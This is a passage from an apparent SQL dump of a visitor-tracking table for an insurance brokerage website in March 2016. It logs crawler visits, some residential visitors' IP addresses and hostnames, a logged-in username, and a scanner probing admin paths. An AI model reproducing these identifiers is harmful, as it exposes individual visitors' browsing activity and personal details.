Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4319,'0b_cbbe81b58982d4fd83683de9054771c4','1457894476','205.203.134.197','205.203.134.197','/licensing-contracting/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4322,'0b_cbbe81b58982d4fd83683de9054771c4','1457894486','205.203.134.197','205.203.134.197','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4323,'0b_cbbe81b58982d4fd83683de9054771c4','1457894498','205.203.134.197','205.203.134.197','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4325,'0b_cbbe81b58982d4fd83683de9054771c4','1457894508','205.203.134.197','205.203.134.197','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4328,'0b_cbbe81b58982d4fd83683de9054771c4','1457894519','205.203.134.197','205.203.134.197','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4329,'0b_cbbe81b58982d4fd83683de9054771c4','1457894530','205.203.134.197','205.203.134.197','/register/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4332,'0b_cbbe81b58982d4fd83683de9054771c4','1457894540','205.203.134.197','205.203.134.197','/case-status/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4334,'0b_cbbe81b58982d4fd83683de9054771c4','1457894551','205.203.134.197','205.203.134.197','/forms/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4335,'0b_cbbe81b58982d4fd83683de9054771c4','1457894562','205.203.134.197','205.203.134.197','/term-quotes/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4338,'0b_cbbe81b58982d4fd83683de9054771c4','1457894579','205.203.134.197','205.203.134.197','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4341,'0b_cbbe81b58982d4fd83683de9054771c4','1457894590','205.203.134.197','205.203.134.197','/?page_id=169','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4343,'0b_cbbe81b58982d4fd83683de9054771c4','1457894599','205.203.134.197','205.203.134.197','/members/','Mozilla/5.0 (compatible; Dow Jones Searchbot)','','',0,'','','','','','Searchbot','','','','3','0',0),(4344,'0b_c1481fa9e1c44bc0228889b8d8b262e9','1457894601','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(4346,'0b_c1481fa9e1c44bc0228889b8d8b262e9','1457894614','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(4347,'0b_c1481fa9e1c44bc0228889b8d8b262e9','1457894627','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(4349,'0b_c1481fa9e1c44bc0228889b8d8b262e9','1457894649','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(4350,'0b_ac83b7490d7a1f8ed42d6ba48d276bdb','1457894955','66.249.73.169','crawl-66-249-73-169.googlebot.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(4352,'0b_d24b0966b90fc03050ca4e4ea88ebe28','1457896139','40.77.167.46','msnbot-40-77-167-46.search.msn.com','/SSO/235_18.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4353,'0b_79af6ec002d5d04fd229be69631d7191','1457898209','207.46.13.148','msnbot-207-46-13-148.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4355,'0b_2b8e942d0f146519f396c78e34ff5f0c','1457899375','66.249.73.187','crawl-66-249-73-187.googlebot.com','/contact/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(4358,'0b_c49266ba10f6768309670e6ac1414308','1457900387','66.249.83.209,24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(4359,'0b_b43d40cf98d163f6c8c0cfa75b19fee2','1457900775','157.55.39.170','msnbot-157-55-39-170.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4362,'0b_27b81329358a7d68409ab78af8814f83','1457900779','40.77.167.46','msnbot-40-77-167-46.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4365,'0b_353e678ae4bbd234c4c89fdcc162a3ab','1457902074','178.137.93.120','178-137-93-120-lvv.broadband.kyivstar.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','http://empireins.com/','',0,'Win8','Chrome 48','','','','','','','','0','0',0),(4367,'0b_68dcd2442e28ef94aae413acfad11810','1457902074','178.137.93.120','178-137-93-120-lvv.broadband.kyivstar.net','/','Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0','http://empireins.com/','',0,'Win7','Firefox 44','','','','','','','','0','0',0),(4370,'0b_68dcd2442e28ef94aae413acfad11810','1457902077','178.137.93.120','178-137-93-120-lvv.broadband.kyivstar.net','/register/','Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/register/','',0,'Win7','Firefox 44','','','','','','','','0','0',0),(4371,'0b_353e678ae4bbd234c4c89fdcc162a3ab','1457902077','178.137.93.120','178-137-93-120-lvv.broadband.kyivstar.net','/register/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','http://www.empireins.com/register/','',0,'Win8','Chrome 48','','','','','','','','0','0',0),(4373,'0b_68dcd2442e28ef94aae413acfad11810','1457902080','178.137.93.120','178-137-93-120-lvv.broadband.kyivstar.net','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/aig-releases-new-term-rates-and-re-enters-ny/','',0,'Win7','Firefox 44','','','','','','','','0','0',0),(4374,'0b_353e678ae4bbd234c4c89fdcc162a3ab','1457902080','178.137.93.120','178-137-93-120-lvv.broadband.kyivstar.net','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','http://www.empireins.com/aig-releases-new-term-rates-and-re-enters-ny/','',0,'Win8','Chrome 48','','','','','','','','0','0',0),(4377,'0b_68dcd2442e28ef94aae413acfad11810','1457902081','178.137.93.120','178-137-93-120-lvv.broadband.kyivstar.net','/aig-releases-new-term-rates-and-re-enters-ny/feed/','Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/aig-releases-new-term-rates-and-re-enters-ny/feed/','',0,'Win7','Firefox 44','','','','','','','','0','0',0),(4380,'0b_353e678ae4bbd234c4c89fdcc162a3ab','1457902081','178.137.93.120','178-137-93-120-lvv.broadband.kyivstar.net','/aig-releases-new-term-rates-and-re-enters-ny/feed/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','http://www.empireins.com/aig-releases-new-term-rates-and-re-enters-ny/feed/','',0,'Win8','Chrome 48','','','','','','','','0','0',0),(4382,'0b_68dcd2442e28ef94aae413acfad11810','1457902082','178.137.93.120','178-137-93-120-lvv.broadband.kyivstar.net','/aig-releases-new-term-rates-and-re-enters-ny/feed/empireins.com','Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/empireins.com','',0,'Win7','Firefox 44','','','','','','','','0','0',0),(4385,'0b_353e678ae4bbd234c4c89fdcc162a3ab','1457902082','178.137.93.120','178-137-93-120-lvv.broadband.kyivstar.net','/aig-releases-new-term-rates-and-re-enters-ny/feed/empireins.com','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','http://www.empireins.com/empireins.com','',0,'Win8','Chrome 48','','','','','','','','0','0',0),(4386,'0b_353e678ae4bbd234c4c89fdcc162a3ab','1457902083','178.137.93.120','178-137-93-120-lvv.broadband.kyivstar.net','/feed/empireins.com','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','http://www.empireins.com/feed/empireins.com','',0,'Win8','Chrome 48','','','','','','','','0','0',0),(4388,'0b_68dcd2442e28ef94aae413acfad11810','1457902083','178.137.93.120','178-137-93-120-lvv.broadband.kyivstar.net','/feed/empireins.com','Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0','http://www.empireins.com/feed/empireins.com','',0,'Win7','Firefox 44','','','','','','','','0','0',0),(4389,'0b_cbdfccaf08aba4052e31eb80b9585ab0','1457903538','157.55.39.159','msnbot-157-55-39-159.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4391,'0b_867a6febde5198dd2eb0efda0fcc7e08','1457905568','92.237.147.236','cpc87293-slou4-2-0-cust235.17-4.cable.virginm.net','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/601.4.4','https://www.google.co.uk/','_notprovided_',1,'MacOSX','Safari 9','gb','','Google UK','','','','','0','0',0),(4392,'0b_867a6febde5198dd2eb0efda0fcc7e08','1457905571','92.237.147.236','cpc87293-slou4-2-0-cust235.17-4.cable.virginm.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/601.4.4','http://www.empireins.com/','',0,'MacOSX','Safari 9','us','','','','','','','0','0',0),(4394,'0b_9eac7ee9c6f6b20c48210294ea8076c8','1457906733','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(4395,'0b_76d5b1b4fbea7557e5fd458bfd70faf4','1457907175','66.249.73.187','crawl-66-249-73-187.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(4397,'0b_80968e60dccaafcddb86abcd42b1851e','1457911276','157.55.39.159','msnbot-157-55-39-159.search.msn.com','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4400,'0b_80968e60dccaafcddb86abcd42b1851e','1457911318','157.55.39.159','msnbot-157-55-39-159.search.msn.com','/quotes.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4401,'0b_2d6a234cc001bee5ea8d8fe14cdf1de9','1457912966','141.8.143.235','spider-141-8-143-235.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(4404,'0b_5986fdd81a1badaa1a8b419d4b6f10a3','1457912966','100.43.81.152','spider-100-43-81-152.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(4406,'0b_94ccf24b41345b27f2dca39fe6010dc7','1457915321','52.37.129.83','ec2-52-37-129-83.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(4407,'0b_94ccf24b41345b27f2dca39fe6010dc7','1457915349','52.37.129.83','ec2-52-37-129-83.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(4410,'0b_6c582de47ff49844a4b38971baf77d62','1457915402','52.37.129.83','ec2-52-37-129-83.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(4413,'0b_6c582de47ff49844a4b38971baf77d62','1457915402','52.37.129.83','ec2-52-37-129-83.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(4416,'0b_0a35cb906139ac6c8c1721dbde84399c','1457915987','207.46.13.148','msnbot-207-46-13-148.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4419,'0b_0369bce29b37ca4a708cfffe1315f603','1457922022','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(4422,'0b_0c18757fb28221384cd9ed6909ac7bd9','1457922056','70.121.152.41','cpe-70-121-152-41.satx.res.rr.com','/','Mozilla/5.0 (Linux; Android 5.1.1; SM-G925T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.91 Mobile Safari/537.36','','',0,'Android 5','Chrome 49 Mobile','us','360 x 640','','','','','','0','0',0),(4425,'0b_0c18757fb28221384cd9ed6909ac7bd9','1457922058','70.121.152.41','cpe-70-121-152-41.satx.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; SM-G925T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.91 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 49 Mobile','us','360 x 640','','','','','','0','0',0),(4427,'0b_0c18757fb28221384cd9ed6909ac7bd9','1457922091','70.121.152.41','cpe-70-121-152-41.satx.res.rr.com','/register/','Mozilla/5.0 (Linux; Android 5.1.1; SM-G925T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.91 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 49 Mobile','us','360 x 640','','','','','','0','0',0),(4430,'0b_0c18757fb28221384cd9ed6909ac7bd9','1457922177','70.121.152.41','cpe-70-121-152-41.satx.res.rr.com','/','Mozilla/5.0 (Linux; Android 5.1.1; SM-G925T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.91 Mobile Safari/537.36','','',0,'Android 5','Chrome 49 Mobile','us','360 x 640','','','','','','0','51',0),(4431,'0b_0c18757fb28221384cd9ed6909ac7bd9','1457922178','70.121.152.41','cpe-70-121-152-41.satx.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; SM-G925T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.91 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 49 Mobile','us','360 x 640','','','','','','0','0',0),(4434,'0b_6f3bccbe12ff433ab099a20cfa5f7238','1457922693','52.37.151.42','ec2-52-37-151-42.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(4436,'0b_6f3bccbe12ff433ab099a20cfa5f7238','1457922702','52.37.151.42','ec2-52-37-151-42.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(4439,'0b_6f3bccbe12ff433ab099a20cfa5f7238','1457922799','52.37.151.42','ec2-52-37-151-42.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(4440,'0b_6f3bccbe12ff433ab099a20cfa5f7238','1457922800','52.37.151.42','ec2-52-37-151-42.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(4442,'0b_ba25bfb54dff0e5047a2745bd3071c41','1457923071','40.77.167.46','msnbot-40-77-167-46.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4443,'0b_5c701715b62087e37624395ac67bf1db','1457924848','157.55.39.170','msnbot-157-55-39-170.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4445,'0b_5c701715b62087e37624395ac67bf1db','1457925835','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4448,'0b_7fe22bcac5f863dd3d95a90ecb714d13','1457928916','157.55.39.159','msnbot-157-55-39-159.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4451,'0b_7fe22bcac5f863dd3d95a90ecb714d13','1457928917','157.55.39.159','msnbot-157-55-39-159.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4452,'0b_02ae6463257a856644000f6c7c7aa9e0','1457929255','199.185.0.215','199.185.0.215','/robots.txt','VSE/1.0 (rabraham@multiview.com)','','',0,'','','','','','VSE','','','','0','0',0),(4455,'0b_02ae6463257a856644000f6c7c7aa9e0','1457929267','199.185.0.215','199.185.0.215','/','VSE/1.0 (rabraham@multiview.com)','','',0,'','','','','','VSE','','','','0','0',0),(4457,'0b_7fe22bcac5f863dd3d95a90ecb714d13','1457929603','157.55.39.159','msnbot-157-55-39-159.search.msn.com','/paramed.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4458,'0b_746652e487d0864830242c5b8c4d47a9','1457931376','157.55.39.170','msnbot-157-55-39-170.search.msn.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4461,'0b_f68d14929ef27d8b9dd78dbfa2ee2c09','1457932084','157.55.39.170','msnbot-157-55-39-170.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4464,'0b_449b61d2c47248f24aeb438046203451','1457932777','207.46.13.148','msnbot-207-46-13-148.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4466,'0b_16b53a53ae5cbf1f0eac94ee18ecfa82','1457934232','184.73.5.183','ec2-184-73-5-183.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB6 (.NET CLR 3.5.30729)','','',0,'WinVista','Firefox 3','us','','','','','','','0','0',0),(4467,'0b_0bcd1150fc3f3b0a3e92b7658a0db422','1457934656','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4470,'0b_6a2fad2baab66b3dfbe06688735d1d3c','1457935432','80.87.202.95','it8.fvds.ru','/admin/','Searching for Django sites. Please, don\\\'t send abuse, it is just single GET request!','','',0,'','','ru','','','Searching','','','','0','0',0),(4472,'0b_ab1b3022eb13be33b21af1d4a4b4f7a9','1457935434','80.87.202.95','it8.fvds.ru','/admin/','Go 1.1 package http','http://empireins.com/admin/','',0,'','','ru','','','Go','','','','0','0',0),(4475,'0b_ab1b3022eb13be33b21af1d4a4b4f7a9','1457935436','80.87.202.95','it8.fvds.ru','/wp-admin/','Go 1.1 package http','http://www.empireins.com/admin/','',0,'','','ru','','','Go','','','','0','0',0),(4476,'0b_66902085a688decbb327d77ace13166b','1457935903','74.14.23.76','toroon2196w-lp130-01-1242437452.dsl.bell.ca','/','','','',0,'','','ca','','','Unknown Spider','','','','0','0',0),(4479,'0b_8fd6d14818aa13de8c03f22cbbb487a2','1457937942','40.77.167.46','msnbot-40-77-167-46.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(4481,'0b_934dfb135d87121f05454c5f34bb5c58','1457937951','199.30.16.166','msnbot-199-30-16-166.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b','http://www.empireins.com/','',0,'MacOSX','Safari 9537','','','','BingBot','','','','0','0',0),(4482,'0b_7e071a231c99c2c774015c2fd5d395d4','1457939300','195.154.200.93','195-154-200-93.rev.poneytelecom.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(4485,'0b_7e071a231c99c2c774015c2fd5d395d4','1457939314','195.154.200.93','195-154-200-93.rev.poneytelecom.eu','/SSO/235_39.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(4487,'0b_7e071a231c99c2c774015c2fd5d395d4','1457939317','195.154.200.93','195-154-200-93.rev.poneytelecom.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(4488,'0b_7e071a231c99c2c774015c2fd5d395d4','1457939320','195.154.200.93','195-154-200-93.rev.poneytelecom.eu','/SSO/235_39.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(4490,'0b_7e071a231c99c2c774015c2fd5d395d4','1457939324','195.154.200.93','195-154-200-93.rev.poneytelecom.eu','/SSO/235_42.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(4491,'0b_7e071a231c99c2c774015c2fd5d395d4','1457939329','195.154.200.93','195-154-200-93.rev.poneytelecom.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(4493,'0b_70abb272bd164e66ce7e5c859921c78d','1457942696','199.185.0.215','199.185.0.215','/robots.txt','VSE/1.0 (rabraham@multiview.com)','','',0,'','','','','','VSE','','','','0','0',0),(4494,'0b_24431234996c0413d1e4a4b078bded45','1457944966','199.185.0.215','199.185.0.215','/','VSE/1.0 (rabraham@multiview.com)','','',0,'','','','','','VSE','','','','0','0',0),(4497,'0b_32615b410ddf0ce467d3f7aa10b4e616','1457946827','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(4499,'0b_2189f3dd452301336e8e4caeb93ff098','1457946881','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4502,'0b_2189f3dd452301336e8e4caeb93ff098','1457947408','157.55.39.170','msnbot-157-55-39-170.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4503,'0b_6e386977c4973f180ba1643bf5b9467d','1457947599','164.132.161.87','ns3036350.ip-164-132-161.eu','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)','','',0,'','','eu','','','Unknown Spider','','','','0','0',0),(4505,'0b_6700e42e8a43e401ac9ed0e845961a8b','1457948168','207.46.13.148','msnbot-207-46-13-148.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4508,'0b_2db3b6a432d39fdd7c8c22c56abe9a2d','1457950145','66.249.73.169','crawl-66-249-73-169.googlebot.com','/contact/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(4509,'0b_2db3b6a432d39fdd7c8c22c56abe9a2d','1457950217','66.249.73.169','crawl-66-249-73-169.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(4512,'0b_2db3b6a432d39fdd7c8c22c56abe9a2d','1457950231','66.249.73.169','crawl-66-249-73-169.googlebot.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://www.empireins.com/','',0,'','','us','','','Googlebot','','','','0','0',0),(4515,'0b_2db3b6a432d39fdd7c8c22c56abe9a2d','1457950261','66.249.73.169','crawl-66-249-73-169.googlebot.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','us','','','Googlebot','','','','0','0',0),(4518,'0b_2db3b6a432d39fdd7c8c22c56abe9a2d','1457950298','66.249.73.169','crawl-66-249-73-169.googlebot.com','/discl.htm','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','us','','','Googlebot','','','','0','0',0),(4520,'0b_2db3b6a432d39fdd7c8c22c56abe9a2d','1457950353','66.249.73.169','crawl-66-249-73-169.googlebot.com','/igo/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','us','','','Googlebot','','','','0','0',0),(4521,'0b_7ac86cedd3896fb3cb59828ec41bd257','1457953354','208.115.111.66','208-115-111-66-reverse.wowrack.com','/members/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, 